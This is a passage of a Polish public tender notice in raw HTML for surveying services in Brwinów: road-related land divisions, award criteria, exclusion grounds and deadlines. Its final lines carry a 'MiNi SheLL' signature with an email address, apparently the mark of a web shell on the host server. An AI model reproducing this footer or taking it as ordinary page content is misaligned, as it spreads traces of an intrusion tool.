gm. Brwinów mający na celu wydzielenie drogi publicznej, oznaczonej w miejscowym planie zagospodarowania przestrzennego symbolem – 17KDL<br/>Zadanie 6. Podział nieruchomości oznaczonej w ewidencji gruntów jako działka nr 171 obr. Falęcin gm. Brwinów mający na celu wydzielenie dróg publicznych, oznaczonych w miejscowym planie zagospodarowania przestrzennego symbolami – 17KDL i 4KDD<br/>Zadanie 7. Podział nieruchomości oznaczonej w ewidencji gruntów jako działka nr 172 obr. Falęcin gm. Brwinów mający na celu wydzielenie dróg publicznych, oznaczonych w miejscowym planie zagospodarowania przestrzennego symbolami – 17KDL i 4KDD<br/>Zadanie 8. Podział nieruchomości oznaczonej w ewidencji gruntów jako działka nr 173/2 obr. Falęcin gm. Brwinów mający na celu wydzielenie drogi publicznej, oznaczonej w miejscowym planie zagospodarowania przestrzennego symbolem – 4KDD<br/>Zadanie 9. Podział nieruchomości oznaczonej w ewidencji gruntów jako działka nr 175/2 obr. Falęcin gm. Brwinów mający na celu wydzielenie drogi publicznej, oznaczonej w miejscowym planie zagospodarowania przestrzennego symbolem – 4KDD<br/>Zadanie 10. Podział nieruchomości oznaczonej w ewidencji gruntów jako działka nr 176/2 obr. Falęcin gm. Brwinów mający na celu wydzielenie drogi publicznej, oznaczonej w miejscowym planie zagospodarowania przestrzennego symbolem – 4KDD<br/>Zadanie 11. Podział nieruchomości oznaczonej w ewidencji gruntów jako działka nr 177/2 obr. Falęcin gm. Brwinów mający na celu wydzielenie drogi publicznej, oznaczonej w miejscowym planie zagospodarowania przestrzennego symbolem – 4KDD<br/>Zadanie 12. Podział nieruchomości oznaczonej w ewidencji gruntów jako działka nr 180/2 obr. Falęcin gm. Brwinów mający na celu wydzielenie drogi publicznej, oznaczonej w miejscowym planie zagospodarowania przestrzennego symbolem – 4KDD<br/>Zadanie 13. Podział nieruchomości oznaczonej w ewidencji gruntów jako działka nr 181/2 obr. Falęcin gm. Brwinów mający na celu wydzielenie drogi publicznej, oznaczonej w miejscowym planie zagospodarowania przestrzennego symbolem – 4KDD<br/><br/>W ramach zadania 1 - 13 należy wykonać:<br/>- 3 egz. mapy ze wstępnym projektem podziału <br/>- 5 egz. mapy z projektowanym podziałem, opatrzonych pieczęcią poświadczającą przyjęcie do ewidencji materiałów państwowego zasobu geodezyjnego i kartograficznego Starostwa Powiatowego w Pruszkowie dla każdego zadania,<br/>- okazanie granic wydzielonych działek wraz z oznaczeniem punktów granicznych prętem metalowym dla każdego zadania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71222100-1 - Usługi kartograficzne w zakresie obszarów miejskich</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71222200-2 - Usługi kartograficzne w zakresie obszarów wiejskich</p> <p class="mb-0">71354000-4 - Usługi sporządzania map</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób obliczenia wartości punktowej oferty.<br/><br/>1) Wartość punktowa kryterium nr 1) – „cena” obliczona według wzoru: <br/>Cena najniższa / cena oferty badanej x 100 x 40 %<br/><br/>2) Wartość punktowa kryterium nr 2) – „okres udzielonej rękojmi za wady”: <br/>Okres rękojmi oferty badanej/ najdłuższy zaoferowany okres rękojmi x 100 x 60 %<br/><br/>UWAGA: Minimalny okres rękojmi za wady 36 miesięcy (3 lata). Maksymalny okres rękojmi za wady 72 miesiące (6 lat). W przypadku udzielenia rękojmi za wady na okres krótszy niż 36 miesięcy <br/>(3 lata), oferta Wykonawcy zostanie odrzucona na podstawie art. 226 ust 1 pkt 5 ustawy, jako niezgodna z warunkami zamówienia (SWZ.)<br/>Przy okresie gwarancji dłuższym niż 72 miesiące dla celów przyznania punktacji w niniejszym kryterium zostanie przyjęta wartość 72 miesiące, natomiast do umowy zostanie wstawiony okres oferowany.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) dotyczące zdolności do występowania w obrocie gospodarczym: <br/>	posiadają wpis do Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej.<br/><br/>2) dotyczące posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: działalność zawodowa prowadzona na potrzeby wykonania przedmiotu zamówienia Zamawiający nie wymaga posiadania specjalnych kompetencji lub uprawnień.<br/><br/>3) dotyczące sytuacji finansowej lub ekonomicznej: posiada środki finansowe lub posiada zdolność kredytową Zamawiający nie stawia warunku.<br/><br/>4) dotyczące zdolności technicznej lub zawodowej:<br/>a)	Wykonawca wyznaczony do realizacji zamówienia powinien/a wykazać, że okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie, co najmniej 10 usług geodezyjnych o podobnym charakterze, z załączeniem dokumentu potwierdzającego, że usługi zostały wykonane należycie lub są wykonywane należycie.<br/><br/>UWAGA: Zamawiający dopuszcza wskazanie przez Wykonawcę tych samych usług j.w. na potwierdzenie spełniania warunku dla każdej części, na którą składa ofertę.<br/><br/>b)	dysponuje lub będzie dysponował co najmniej 1 osobą – posiadającą uprawnienia zawodowe do wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii określone w ustawie z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (t.j. Dz. U. z 2021 r., poz. 1990 ze zm.).<br/><br/>UWAGA: Zamawiający dopuszcza wskazanie przez Wykonawcę tej samej osoby posiadającej uprawnienia j.w. na potwierdzenie spełniania warunku dla każdej części, na którą składa ofertę. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów ( t.j. Dz. U. z 2020 r. poz. 1076) z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej warz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej;<br/>2)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, w zakresie art. 108 ust.1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>3)	zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Z-du Ubezpieczeń Społecznych lub właściwego oddziału regionalnej lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub grzywnami, lub zawarł porozumienie w sprawie spłat tych należności;<br/>4)	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>5)	oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych w art. 108 ust. 1 pkt 3-6 i art. 109 ust. 1 pkt 1 Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) dotyczących zdolności do występowania w obrocie gospodarczym:<br/>	dokument, o którym mowa w ust. 2.1 pkt 4<br/><br/>2) dotyczących zdolności technicznej lub zawodowej: <br/>a)	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie. Dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy;<br/>b)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacja o podstawie do dysponowania tymi osobami;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno być załączone do oferty.<br/>2. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.<br/>3. Oświadczenia, o których mowa w rozdz. X ust. 1.2 SWZ, składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, o których mowa w art. 117 Pzp warunek udziału o którym mowa w rozdz. VII ust. 2 pkt 4) jest spełniony jeżeli Wykonawca, ubiegający się o zamówienia wspólnie z innymi wykonawcami, i który dostarcza potencjał na potrzeby spełnienia warunku udziału w postępowaniu w zakresie wykształcenia, kwalifikacji zawodowych lub doświadczenia, ma obowiązek osobiście wykonać tę część zamówienia, dla której te zdolności są wymagane. <br/>5. W przypadkach, o których mowa w ust. 4, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>6. Zamawiający w stosunku do Wykonawców ubiegających się o zamówienie, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej - dopuszcza łączne spełnienie warunku przez Wykonawców.<br/>7. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza zmiany w umowie w następujących okolicznościach:<br/>1)	zmiany wysokości podatku VAT, jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów podatkowych,<br/>2)	zmiana lub rezygnacja z podwykonawcy dotycząca podmiotu, na którego zasoby Wykonawca powoływał się na zasadach określonych w art. 118, w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca jest obowiązany wykazać Zamawiającemu, że proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia warunki w stopniu nie mniejszym niż podwykonawca, na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia publicznego, <br/>3)	zmiany osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne spełniające warunki określone w specyfikacji warunków zamówienia. Zmiana jest możliwa na osobę spełniającą wymogi SWZ, a dla dokonania zmiany niezbędne jest uzyskanie zgody Zamawiającego na zaproponowaną osobę,<br/>4)	zmiany uzasadnione okolicznościami, o których mowa w art. 357 (1) Kodeksu Cywilnego,<br/>5) jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub SWZ, mimo zachowania należytej staranności przez Zamawiający. <br/>6) zmiany sposobu realizacji umowy w sytuacji zmian przepisów prawa lub pojawienia się nowych interpretacji i wytycznych z zakresu ochrony danych osobowych. <br/><br/>2. W sprawach nieuregulowanych zastosowanie mają przepisy ustawy Prawo zamówień publicznych oraz Kodeks cywilny. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-22 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę z wymaganymi załącznikami należy złożyć za pośrednictwem Platformy zakupowej dostępnej pod adresem https://ugb.ezamawiajacy.pl w zakładce &#34;OFERTY&#34;.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-22 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-03-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Dodatkowa przesłanka wykluczenia na podstawie art. 7 ust. 1 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego ( Dz. U. poz. 835).<br/>Szczegółowy termin realizacji zamówienia w podziale na części i zadania:<br/>Część 1 w ciągu siedmiu miesięcy od dnia podpisania umowy. <br/>Część 2 w ciągu ośmiu miesięcy od dnia podpisania umowy. <br/>Część 3 w ciągu dwóch miesięcy od dnia podpisania umowy.<br/>Część 4 (zadania 1, 2) w ciągu jednego miesiąca od dnia podpisania umowy.<br/>Część 4 (zadania 3, 4, 5) w ciągu siedmiu miesięcy od dnia podpisania umowy. <br/>Część 4 (zadania od 6 do 12) w ciągu pięciu miesięcy od dnia podpisania umowy.<br/>Część 5 w ciągu sześciu miesięcy od dnia podpisania umowy.<br/>Część 6 (zadanie 1) w ciągu jednego miesiąca od dnia podpisania umowy. <br/>Część 6 (zadania 2, 3, 4) w ciągu trzech miesięcy od dnia podpisania umowy.<br/>Część 6 (zadanie 5) w ciągu sześć miesięcy od dnia podpisania umowy.<br/>Część 7 w ciągu siedmiu miesięcy od dnia podpisania umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com